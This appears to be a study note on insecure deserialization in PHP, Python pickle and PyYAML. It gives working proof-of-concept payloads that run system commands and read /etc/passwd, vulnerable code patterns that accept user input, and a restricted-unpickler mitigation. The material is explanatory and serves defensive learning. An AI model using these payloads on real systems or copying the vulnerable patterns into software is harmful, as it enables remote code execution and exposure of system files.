The decoding and transformation of user supplied data into language objects can result in remote code execution.
[ref](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Insecure Deserialization/PHP.md)
- Look at the code.
- Identify functions that do something malicious based on user input, for example a magic method that passes a property to `system()`:
  ```php
  class Foo { private $cmd = "ls"; function __toString() { return system($this->cmd); } }
  ```
- Find out where they are executed; here `echo` triggers `__toString()` on the unserialized object:
  ```php
  $x = unserialize($_GET["data"]); echo $x;
  ```
- Write a class that sets the properties to what you want. Methods cannot be overridden: only property values travel in the serialized string, the method bodies come from the class already loaded on the server.
  ```php
  class Foo { private $cmd = "cat /etc/passwd"; }
  ```
- Instantiate and serialize the class:
  ```php
  $f = new Foo(); echo serialize($f);
  ```
Things to note:
- You cannot override methods
- You do not need to deserialize to the class the application expects; any class will do as long as it is defined (or autoloadable) at the moment `unserialize()` runs
pickle — Python object serialization — Python 3.9.4 documentation
Vulnerable code:
```python
# Attacker's code
import os
import pickle

class Exploit:
    def __reduce__(self):
        # os doesn't need to be imported on the victim: the pickle stream names
        # os.system by module and name, and the unpickler imports it itself
        return os.system, ("cat /etc/passwd",)

pic = pickle.dumps(Exploit())

# Victim's code
data = pickle.loads(pic)
```
Notes:
- Python versions must be compatible (the victim's interpreter must be able to read the pickle protocol used)
- All python versions are vulnerable
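The usual mitigation for the `__reduce__` path above, added here as an example (it is not code from the page): a restricted unpickler in the allow-list style the pickle documentation recommends, whose `find_class` refuses every global not explicitly listed, so a stream naming `os.system` never resolves. The `SAFE_GLOBALS` contents, the `HypotheticalReduce` class and both pickled inputs are constructed assumptions.

```python
import io
import os
import pickle

# Allow-list of (module, name) pairs the application legitimately needs.
# Everything else, including os.system from the payload above, is refused.
SAFE_GLOBALS = {
    ("builtins", "set"),
    ("builtins", "frozenset"),
    ("collections", "OrderedDict"),
}


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that resolves GLOBAL/STACK_GLOBAL only against SAFE_GLOBALS."""

    def find_class(self, module, name):
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def load_or_reject(data: bytes):
    """Return ('ok', obj) for allow-listed streams, ('rejected', reason) otherwise."""
    try:
        return "ok", RestrictedUnpickler(io.BytesIO(data)).load()
    except pickle.UnpicklingError as exc:
        return "rejected", str(exc)


# Constructed inputs (not from the page): a benign session record, and a
# __reduce__ payload of the same shape as the exploit above. os.getcwd stands
# in for os.system so the stream is harmless even through plain pickle.loads.
class HypotheticalReduce:
    def __reduce__(self):
        return os.getcwd, ()


BENIGN_PICKLE = pickle.dumps({"user": "alice", "roles": ["admin"], "tags": {"a", "b"}})
MALICIOUS_PICKLE = pickle.dumps(HypotheticalReduce())

if __name__ == "__main__":
    print(load_or_reject(BENIGN_PICKLE))     # ('ok', {...})
    print(load_or_reject(MALICIOUS_PICKLE))  # ('rejected', "global '...getcwd' is forbidden")
```

The allow-list only controls which globals resolve; it does not make unpickling of untrusted input safe in general, so it belongs behind a signature or other integrity check on the stream.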
Payload (PyYAML; the map's arguments are nested under it, so the document evaluates to `tuple(map(eval, [...]))`):
```yaml
!!python/object/new:tuple
- !!python/object/new:map
  - !!python/name:eval
  - [ "print(__import__('os').system('ls'))" ]
```
Vulnerable code:
```python
import yaml

# payload is the user-supplied YAML document shown above.
# The full Loader honours !!python/ tags; yaml.safe_load() refuses them.
# PyYAML 6 requires the Loader argument explicitly.
yaml.load(payload, Loader=yaml.Loader)
```